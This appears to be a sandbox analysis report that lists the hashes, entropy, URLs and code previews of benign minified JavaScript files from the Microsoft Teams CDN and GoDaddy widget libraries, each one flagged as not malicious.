                                                                                                                                                                                                                          Entropy (8bit):5.301211793639726
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38YKmDCex7DpbSHIo4OqoYVMcGOqolHixNSYbH:wp3sp37bCkvVk2qH
                                                                                                                                                                                                                          MD5:F12EA2701724109C363A74AF2EA3EA39
                                                                                                                                                                                                                          SHA1:DA31AFBF27568A376C8BE1B792C9372B31C2C4E9
                                                                                                                                                                                                                          SHA-256:0D8398F412E8E9C50053E27370BBFCC05728D5661835987D3838171434A602D8
                                                                                                                                                                                                                          SHA-512:BB5963F801DF116F9AB20799365BABF10C864CF14E1A82C1E9DD03C8C2364F4D6819598B7BB0D7191DE2D0D94137980CF6DF05079416373E66B55D733CF72CD4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/718583-24621dda8c5747d2.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[718583],{718583:(e,a,t)=>{t.d(a,{Z:()=>i});var s=t(513432),c=t(395225),l=t.n(c),n=t(485529),r=t(829289),i=(0,n.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 16 16",className:a.svg},s.createElement("path",{className:l()(r.Q.outline,a.outlinePart),d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("g",{className:l()(r.Q.filled,a.filledPart)},s.createElement("path",{d:"M8,1A7,7,0,1,1,1,8,7.008,7.008,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"}),s.createElement("circle",{cx:"8",cy:"8",r:"5"})))},displayName:"RadioButtonIcon"})}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/718583-24621dda8c5747d2.js.map
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):72397
                                                                                                                                                                                                                          Entropy (8bit):5.573376353724739
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:1OXc691wWyysPfUhbGQ1D+p+WX45ikOJoSSFRVZ9IfdT8dSRV4CXM9xt/krh+Dn9:QHk8MQ1eQV3xZBknYVQ7kjxLV
                                                                                                                                                                                                                          MD5:AAF166634E0AF9C57B73959561975D31
                                                                                                                                                                                                                          SHA1:308666AF0F6C45368251D07BB51845D493399905
                                                                                                                                                                                                                          SHA-256:7143F3DCCFAEDF4793A9CFED07CD262C9F3224CCF0109E9549BBE7E40618A773
                                                                                                                                                                                                                          SHA-512:AB77EB4CD34493AA0C1FF623124E596388C0F56307EAAF9D85AC205145ECC494D223975C5EFFF61E083FC07CA6969CC48E40CDF2B6E6F6BA4C5EE302C36E49AE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/509664-7bd4baf7c60bad9d.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[509664],{641939:(e,t,a)=>{a.d(t,{W:()=>r});var r=function(e){return{attributes:{root:{"aria-hidden":e.alt||e["aria-label"]?void 0:"true"}}}}},478176:(e,t,a)=>{a.d(t,{w:()=>n});var r=a(888846),n=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:r.E.bidirectionalDomOrder}}}}},792747:(e,t,a)=>{a.d(t,{j:()=>s});var r=a(953543),n=a(504405),s=function(e){var t;return{attributes:{root:(t={role:"menuitem"},t[n.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Enter},{keyCode:r.ZG}]}}}}}},306749:(e,t,a)=>{a.d(t,{z:()=>r});var r=function(){return{attributes:{root:{role:"img"}}}}},537602:(e,t,a)=>{a.d(t,{q:()=>l});var r=a(716300),n=a(513432),s=a(253070);const l=e=>{const t=n.createContext({value:{current:e},version:{current:-1},listeners:[]});var a;return t.Provider=(a=t.Provider,e=>{const t=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (21816)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):25268
                                                                                                                                                                                                                          Entropy (8bit):5.244661235597918
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:eK5KeeytKyV6bBGPMvSjLIoh0FFiSgNgbl3l:ecKeHiSnI4oiSgNgbr
                                                                                                                                                                                                                          MD5:B0C0EDD821FE30725B9CE18A9D08F412
                                                                                                                                                                                                                          SHA1:2E4E3CD4D3D7A95D6F9EA7B52B447E073102D5CE
                                                                                                                                                                                                                          SHA-256:81C4EA6D6E3BFAEDBF6F0F7534BD917175F8222C78E4AC140A29A493065632AB
                                                                                                                                                                                                                          SHA-512:26AEC53E62E0EA2AEC24C156CE7DBF07D985E64CC2F6721C63C79A523A8A430D32018757DA5E61F9B87AC58D1623BAD34943B69041E4801923FEF6CBE545E360
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/lib/components/Carousel-7574d33c.js",["exports","~/c/_rollupPluginBabelHelpers","~/c/_commonjsHelpers","~/c/interopRequireDefault","~/c/_react_commonjs-external"],(function(e,t,n,i,r){"use strict";var o=n.c((function(e){function t(n){return e.exports=t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e.exports.__esModule=!0,e.exports.default=e.exports,t(n)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports})),s=n.c((function(e){var t=o.default;function n(e){if("function"!=typeof WeakMap)return null;var t=new WeakMap,i=new WeakMap;return(n=function(e){return e?i:t})(e)}e.exports=function(e,i){if(!i&&e&&e.__esModule)return e;if(null===e||"object"!==t(e)&&"function"!=typeof e)return{default:e};var r=n(i);if(r&&r.has(e))return r.get(e);var o={},s=Object.defineProperty&&Object.getOwnPropertyDescr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):101278
                                                                                                                                                                                                                          Entropy (8bit):5.180843417705069
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:0MP300ZdOxmeQtfUUY4jWSW+Xdl5zy7PInz3wxg:0MP300ZdOxmeQtfUyjWSW+t3y7PInz33
                                                                                                                                                                                                                          MD5:F6E56D3FEFD068CFA45ECC1A5A8361D2
                                                                                                                                                                                                                          SHA1:5788DCDE05A9F50570F3E5C2A8D7DEB273B62C7D
                                                                                                                                                                                                                          SHA-256:3D82A80E9E6B79FE1AC58517995E09A973B981F150A15FE2C19473FA26D6C78D
                                                                                                                                                                                                                          SHA-512:DF088AC1E6A4D5B61968178C8510562130DEB3C1754C7C58AE7017A5945E248C2AD1D3F6DB4A78BE216E4CA188D6736DF51BD2447ED929BF3E14A75FDAFC628B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[299770],{638283:(e,t,r)=>{r.d(t,{$:()=>n,V:()=>a});var n,o=r(709183),i=r(623374);!function(e){e[e.Error=0]="Error",e[e.Warning=1]="Warning",e[e.Info=2]="Info",e[e.Verbose=3]="Verbose"}(n||(n={}));var a=function(){function e(e,t){void 0===t&&(t={}),this.level=n.Info;var r=t.correlationId,o=void 0===r?"":r,i=t.level,a=void 0===i?n.Info:i,s=t.piiLoggingEnabled,c=void 0!==s&&s;this.localCallback=e,this.correlationId=o,this.level=a,this.piiLoggingEnabled=c}return e.prototype.logMessage=function(e,t,r){if(!(e>this.level||!this.piiLoggingEnabled&&r)){var a,s=(new Date).toUTCString();a=o.$.isEmpty(this.correlationId)?s+":"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t:s+":"+this.correlationId+"-"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t,this.executeCallback(e,a,r)}},e.prototype.executeCallback=function(e,t,r){this.localCallback&&this.localCallback(e,t,r)},e.prototype.error=function(e){this.logMessage(n.E
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22644)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22761
                                                                                                                                                                                                                          Entropy (8bit):5.355873403232118
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:j6IoOwOTowAe2yY+NTglTuTETn+8DTVDTsDTPDT5ViDT+DTIL1DTa+LglMWYk4zX:j6IoOwOToKNTglTuTET+MTVT8T7TjGTV
                                                                                                                                                                                                                          MD5:A469A9C5812F6F4170AFB3090C000DC7
                                                                                                                                                                                                                          SHA1:D3CCAFB36345240C46E9BD7B3422A02060FB02E4
                                                                                                                                                                                                                          SHA-256:7BF5B630A8DFA1F31C15116E0CA1430C1395029151289EE3126A26208C72F9BF
                                                                                                                                                                                                                          SHA-512:45A89FCE6FB7880CE3BE4413E7A9EFC071D29AA4A8FDB24FE06BB5C033F520B6843CD86B72694FB48619EB7709D416EB91CF3D1D16B7AF31C4B0E4B4DC508EEB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[136417],{943719:(e,s,t)=>{t.r(s),t.d(s,{ANONYMOUS_USER_MRI_TFL_PREFIX:()=>h.F,ANONYMOUS_USER_MRI_TFW_PREFIX:()=>h.et,AliasVisibilitySetting:()=>p.X3,DEFAULT_ZERO_STATE_SUGGESTIONS_TO_SHOW_COUNT:()=>h.X7,EventActionTakenTypes:()=>te.Hh,EventTypes:()=>te.wf,FederatedUserStatus:()=>p.SV,HTTPRequestMethod:()=>p.FL,LayoutTypes:()=>te.ui,M365PersonaType:()=>h.SG,PSTN_MRI_PREFIX:()=>h.Oc,PeoplePickerFilterType:()=>te.gI,PeoplePickerFilters:()=>se.H,PeoplePickerFor:()=>te.d1,PeoplePickerItemType:()=>h.lT,PeopleSearchSource:()=>te.f_,PeopleService:()=>Y,PeopleServiceApiName:()=>p.GA,PeopleUtilities:()=>h.af,PhoneType:()=>p.L,ProfilePictureSize:()=>p.xi,ProfilePictureSizesDescriptions:()=>p.Xz,ProfileUpdateChangeType:()=>Z,ProfileUpdateSyncService:()=>pe,ProfileUpdateSyncStatus:()=>ee,Provider:()=>te.Kq,RequestType:()=>p.Yw,StatusCodeFromMTResponse:()=>p.s9,TFL_SMS_UN_VERIFIED_MRI_PREF
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (10500)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):10608
                                                                                                                                                                                                                          Entropy (8bit):5.449647970342551
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:0jCs08M7Ob5FYFV+B16k8BQb+4g0mcoEz9DOtrMIrD1:0jCkM7Ob5i7+B16k8WK4Z+A9DOtrMIrZ
                                                                                                                                                                                                                          MD5:86473D9A3F80D41C280BD1A6F79DCF2E
                                                                                                                                                                                                                          SHA1:93E56D4F26E2062AF2633010C9565AD6B4D1694E
                                                                                                                                                                                                                          SHA-256:575A0A5B47739B90AF0BD301C78E43013126B75A333FA30326BB8CC0F16327AA
                                                                                                                                                                                                                          SHA-512:F5461C83CC438B03DFDB20FD4F65F331F9F8410DBCE7700B87FED5D5F76A61BC69EE25B2385517BD76357BB8AA33DF7FA5C261526AB49E4ABCFF573B0E021511
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/309556-e5af156e58ebe618.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[309556],{306747:(e,n,t)=>{t.d(n,{W:()=>O});var o=t(513432),r=t(903561),u=t(910889),s=t(437932),a=t(411947),l=t(589256),i=t(602835),c=t(132915),p=t(585536),v=t(257495),d=t(953291),f=t(35871),m=t(553864),g=t(868976),k=t(719914),b=t(514795);const h=["after","after-bottom","before-top","before","before-bottom","above"],y=e=>{const[n,t]=(0,l.i)({state:e.checkedValues,defaultState:e.defaultCheckedValues,initialState:{}});return[n,(0,i.D)(((n,{name:o,checkedItems:r})=>{var u;null===(u=e.onCheckedValueChange)||void 0===u||u.call(e,n,{name:o,checkedItems:r}),t((e=>({...e,[o]:r})))}))]},C=e=>{const{targetDocument:n}=(0,f.useFluent_unstable)(),t=(0,g.tv)((e=>e.setOpen)),r=(0,i.D)(((n,t)=>{var o;return null===(o=e.onOpenChange)||void 0===o?void 0:o.call(e,n,t)})),u=o.useRef(!1),[s,a]=(0,l.i)({state:e.open,defaultState:e.defaultOpen,initialState:!1}),b=(0,i.D)(((n,o)=>{const u=n instanceo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):97849
                                                                                                                                                                                                                          Entropy (8bit):5.49386796124279
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:63FpjFZJRkpt40EncEOUi21jdNpor/ArvEPfKlK56:6VhJS40EncE22HQpPfKlK56
                                                                                                                                                                                                                          MD5:41E2972A4DED74ECCB214740E70A8281
                                                                                                                                                                                                                          SHA1:1444C2790FA392C28F882F92FD4C3476ADCD92BE
                                                                                                                                                                                                                          SHA-256:8282CA02E1299653AE62135917BD57591958C7662F688B60FA24506EA16BE2C9
                                                                                                                                                                                                                          SHA-512:D59C488BD5CA6472146D1FBEE71DA33DFF55B480D3C0D4A50654D8555A2B0B846FB1066277795363A7B55D0CA6A729BDB9EA00CE7369B2F329FFD4D22F841894
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/47330-e2a167f3c69f0c2c.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[47330],{156054:(e,t,n)=>{n.d(t,{j:()=>b});var r=n(340415),i=n(344411),a=n(680828),o=n(779497),s=n(179233),u=n(661187),l=n(679080),c=n(943085),f=["ACCDA","ACCDB","ACCDC","ACCDE","ACCDR","ACCDT","ACCDU","ACCDW","ACCFT","ADE","ADN","ADP","AVI","BMP","CSV","DOC","DOCX","DOT","DOTX","ERR","FON","GIF","HTML","ISO","JPEG","JPG","LACCDB","LDB","LOG","MAD","MAF","MAG","MAM","MAQ","MAR","MAS","MAT","MAU","MAV","MAW","MDA","MDBHTML","MDE","MDN","MDT","MDW","MOV","MP3","MPD","MPG","MPP","MPT","MPW","MPX","MSG","OLS","ONE","ONEPKG","ONETOC","ONETOC2","OST","PDF","PNG","POT","POTHTML","POTX","PPA","PPS","PPSX","PPT","PPTHTML","PPTMHTML","PPTX","PPTXML","PST","PUB","PWZ","RTF","SLDM","SLDX","SLK","THMX","TIF","TIFF","TSX","TTF","TXT","VDW","VDX","VHD","VSD","VSDM","VSDX","VSIX","VSL","VSS","VSSM","VSSX","VST","VSTM","VSTX","VSU","VSW","VSX","WAV","WIZHTML","WMA","WMV","WPL","XLS","XLSHTML",
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):71331
                                                                                                                                                                                                                          Entropy (8bit):4.3735714624398625
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:+MCRhlSQwwOZaaRUgrBx3IzKkzq9JkEkZj2A:BCntQeKKQJ4Zj2A
                                                                                                                                                                                                                          MD5:2D397C60A3F6D5F4F77AF5ADE73BDAE3
                                                                                                                                                                                                                          SHA1:0408DF6B9E7A1BB292EA9426CFA160B3C19F7500
                                                                                                                                                                                                                          SHA-256:91DA53C692B4389ADF7BB5E7B17C1B6D42A3BEE56E76D26B0E2CA1D022E5B5A9
                                                                                                                                                                                                                          SHA-512:A27A1E6021459EBB477C9A1D7C36212BAC4D956A5FAE20A6BD58A19BA933C20DBE03AB0E19EB2DD1F03513D4ED16617A538836CF7E87FE9D9D7D5DFC738A6802
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[786989],{786989:(a,l,Z)=>{Z.d(l,{PWb:()=>c,B2b:()=>e,CQn:()=>m,w9k:()=>v,IAD:()=>M,o01:()=>H,nKv:()=>V,F6M:()=>A,xgG:()=>i,dZd:()=>t,HNx:()=>r,dZw:()=>U,xyI:()=>L,xV4:()=>d,b3q:()=>u,zcm:()=>g,OBm:()=>s,caN:()=>R,LSV:()=>T,dOY:()=>o,VPN:()=>F,PJ4:()=>n,k36:()=>C,yKF:()=>S,Qnz:()=>b,slQ:()=>x,gbh:()=>f,yqm:()=>p,TL:()=>k,b2m:()=>B,Zyz:()=>q,n4W:()=>P,$gc:()=>O,zrg:()=>w,Y8E:()=>W,ooj:()=>y,YyX:()=>z,CT4:()=>D,$A0:()=>_,bbI:()=>E,Brd:()=>$,bbB:()=>K,sVv:()=>N,uwv:()=>Q,dwb:()=>I,Hqt:()=>Y,exC:()=>J,qbk:()=>X,hO5:()=>j,tnW:()=>G,gu4:()=>aa,U0q:()=>la,qHH:()=>Za,uVS:()=>ha,aUd:()=>ca,ucc:()=>ea,Km0:()=>ma,mkh:()=>va,QbX:()=>Ma,_uv:()=>Ha,leE:()=>Va,vCx:()=>Aa,oA2:()=>ia,y3C:()=>ta,msU:()=>ra,GU8:()=>Ua,Dqj:()=>La,TXo:()=>da,_Vv:()=>ua,MqR:()=>ga,rqr:()=>sa,FeF:()=>Ra,dv:()=>Ta,$ZY:()=>oa,CfS:()=>Fa,unC:()=>na,d9o:()=>Ca,lQL:()=>Sa,Ozu:()=>ba,EyP:()=>xa,z49:()=>fa,cP8:()=>pa,gDx:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (31325)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):31431
                                                                                                                                                                                                                          Entropy (8bit):5.399135626691903
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:tdO5w+pZxoNkmVh75ihyMxceZAYZeYSZeQGoIzNm2MzebMYz8zWrzdSLO:kOde4fKRmgca
                                                                                                                                                                                                                          MD5:96117FF359F7BB74C8E029A8DE7A0418
                                                                                                                                                                                                                          SHA1:78491116F2639C9BA250FFBF22BF575C6FFE8260
                                                                                                                                                                                                                          SHA-256:35A9D6F5CCB83F45FC664044E841FC7D3CA0859984D57C32D7CCF33E02763815
                                                                                                                                                                                                                          SHA-512:335AF97209D9DBA5281FFDFC30673946948D88974FF90F8533356DB491F3ED20EC4C6350577ABDF88A105011434913E33792231855D0FBD173246EEE6D25130C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/main-77fbafbde8768a32.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[138792],{51304:()=>{!function(){var e=["user-blocking","user-visible","background"];class r{constructor(){this.channel_=new MessageChannel,this.sendPort_=this.channel_.port2,this.messages_={},this.nextMessageHandle_=1,this.channel_.port1.onmessage=e=>this.onMessageReceived_(e)}queueCallback(e){var r=this.nextMessageHandle_++;return this.messages_[r]=e,this.sendPort_.postMessage(r),r}cancelCallback(e){delete this.messages_[e]}onMessageReceived_(e){var r=e.data;if(r in this.messages_){var t=this.messages_[r];delete this.messages_[r],t()}}}function t(){return t.instance_||(t.instance_=new r),t.instance_}class i{constructor(e,r,t){void 0===t&&(t=0),this.callback_=e,this.callbackType_=null,this.handle_=null,this.canceled_=!1,this.schedule_(r,t)}isIdleCallback(){return 0===this.callbackType_}cancel(){if(!this.canceled_)switch(this.canceled_=!0,this.callbackType_){case 0:cancelIdleCallback(this.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):390
                                                                                                                                                                                                                          Entropy (8bit):5.206764812811324
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:F9o8fAX7s4Bszv4yA5FKJyR8aBzzNWLc3oqcqAdfFwC6emGHr9EJiKWayfAX7A:HGs4Bkv4yA5sy+go9Hf+eTHr+pWOA
                                                                                                                                                                                                                          MD5:C86B7F8224FA45FB1682AC94D8F75AC6
                                                                                                                                                                                                                          SHA1:9561F67AAE74B14702DB79C22F9C7F9E6F3B3239
                                                                                                                                                                                                                          SHA-256:010083B88E95F18CEFDB90796ACCE02073E91FC8DFEFB27A7F5F3F75529E4906
                                                                                                                                                                                                                          SHA-512:B239BAC43D973D0076F4E0C0720906560B0AED76472F50202841B2EABB66C5AD5774E35449007AA2DC3E6A096330AB14D1AA9374645136C89A20B45E4BBDBC52
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/c/interopRequireDefault-c83974f7.js
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/interopRequireDefault-c83974f7.js",["exports","~/c/_commonjsHelpers"],(function(e,o){"use strict";var t=o.c((function(e){e.exports=function(e){return e&&e.__esModule?e:{default:e}},e.exports.__esModule=!0,e.exports.default=e.exports}));e.i=t})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=interopRequireDefault-c83974f7.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):345614
                                                                                                                                                                                                                          Entropy (8bit):5.576922897342878
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:vZ+rzcdNHCfxuEnszSXTaqKMKqpCvk5j79mqmum5dGtAQ:vkzcdNif7szSXTaSK0
                                                                                                                                                                                                                          MD5:21EFC098C5558E40F37779F5DF5BDDFB
                                                                                                                                                                                                                          SHA1:F657E98C0AB058F121CB26190CBB9AAF2E0A6C99
                                                                                                                                                                                                                          SHA-256:17438E479CAA3BA8FD0D43622D90058C85211E3CAE7FCF32A057812EBE13A7CC
                                                                                                                                                                                                                          SHA-512:C10CB0F2281959C491F3C99A53BBFA4A497EE801557CFB50BC249C33E44291C07B334472FD66CDE77401BBD1374F3D7A35A9693D3E6C3DC1DD03909E78C927CB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/core-essentials-8a2700f43401ea74.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[407772],{73654:(e,t,n)=>{"use strict";n.d(t,{o:()=>s});var o=n(513432);const{useEffect:r,useRef:i,useState:a}=o;function s(e){const t=i(!1),n=i(new Image),[o,s]=a(!1);return e&&n.current.src!==e&&(n.current.src=e),n.current.onerror=()=>{t.current&&s(!0)},r((()=>(t.current||(t.current=!0),()=>{t.current=!1})),[]),o}},808761:(e,t,n)=>{"use strict";n.d(t,{O:()=>s});var o=n(193021),r=n(707754),i=n(332752),a=n(440320);function s(e,t,{coreShortcutService:n,shortcutExecutionService:s,enableShortcutPropagation:l,isBridge:c,windowProvider:d,windowId:u,clientPreferences:p}={},g,h){const m=d||(0,o.z)(),S=/Mac|iPod|iPhone|iPad/.test(navigator.platform),{applyDesktopKeymappingStrategy:y,applySurfaceHubKeymappingStrategy:f,enableDevShortcuts:C,enableShortcutRegistrationWithDesktopClient:A,enableGlobalShortcuts:I,globalShortcuts:b,useF6LandmarkDesktop:v,revertMacOptShortcuts:w}=t.get(i.w.Shortcuts,["app
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65269)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):312247
                                                                                                                                                                                                                          Entropy (8bit):5.502991899470642
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:crKM0OMeOJTW+0V0AorJwXeBHh0qdDj1fJmCmT9la8u2tAqXDz7:crp0hefb0HYeB2qdDjlJKTPM2X7
                                                                                                                                                                                                                          MD5:5A57183C018F22F0E5ECC437479E0758
                                                                                                                                                                                                                          SHA1:173FD5E2A40A8585BD72EDFCFE3E89CAF830CFFD
                                                                                                                                                                                                                          SHA-256:A72D05072E625164936884B4D4C86E4C5FDE7F75A54FC68FC328D0C3C62D206E
                                                                                                                                                                                                                          SHA-512:2242DB8F10FCA2DD061EE0D45EB6CF739A0FEF7FE8A5907E421A78717A49D132ACDD9C7761284DD479FC21B954E29EE4063EB2519D75C93221AF607D9CC8E9FC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:/*! For license information please see UX.4.47.0.js.LICENSE.txt */.var Core;(()=>{var e={687:function(e,t,n){var r;e=n.nmd(e),function(){function o(){return hn.Date.now()}function a(e,t,n){switch(n.length){case 0:return e.call(t);case 1:return e.call(t,n[0]);case 2:return e.call(t,n[0],n[1]);case 3:return e.call(t,n[0],n[1],n[2])}return e.apply(t,n)}function l(e,t){for(var n=-1,r=null==e?0:e.length;++n<r&&!1!==t(e[n],n,e););return e}function i(e,t){for(var n=null==e?0:e.length;n--&&!1!==t(e[n],n,e););return e}function u(e,t){for(var n=-1,r=null==e?0:e.length;++n<r;)if(!t(e[n],n,e))return!1;return!0}function s(e,t){for(var n=-1,r=null==e?0:e.length,o=0,a=[];++n<r;){var l=e[n];t(l,n,e)&&(a[o++]=l)}return a}function c(e,t){return!(null==e||!e.length)&&-1<v(e,t,0)}function f(e,t){for(var n=-1,r=null==e?0:e.length,o=Array(r);++n<r;)o[n]=t(e[n],n,e);return o}function d(e,t){for(var n=-1,r=t.length,o=e.length;++n<r;)e[o+n]=t[n];return e}function p(e,t,n,r){var o=-1,a=null==e?0:e.length;for(r&
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (28291)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):28399
                                                                                                                                                                                                                          Entropy (8bit):5.326616207965685
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:MyYDkxf+bxQsDP+pxvWxgGUFk+DUazTmKHgdt6JDBbVLo8/g6hCpocPoQDc1:fEk0p+pYxgcm5/g68GcPo
                                                                                                                                                                                                                          MD5:8C1C0AFCA40BE8D07416F3805585624B
                                                                                                                                                                                                                          SHA1:27C48E1BB6618B9046EEEDF5D98763FA42F0E371
                                                                                                                                                                                                                          SHA-256:F614C28E24FF941A79923399511189CEDD7CA01CA9F460C506D6CD8D64DB7BE9
                                                                                                                                                                                                                          SHA-512:DC2F6C45726EF7349650FCC01E954EFD018F05614FF4454040A96AE41D3AC421DEB49E45B5F88246E3543D9FDBAAC7BC3138A229287228AECD9812C778C1C459
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/209929-95fdc8ec21fd6b75.js
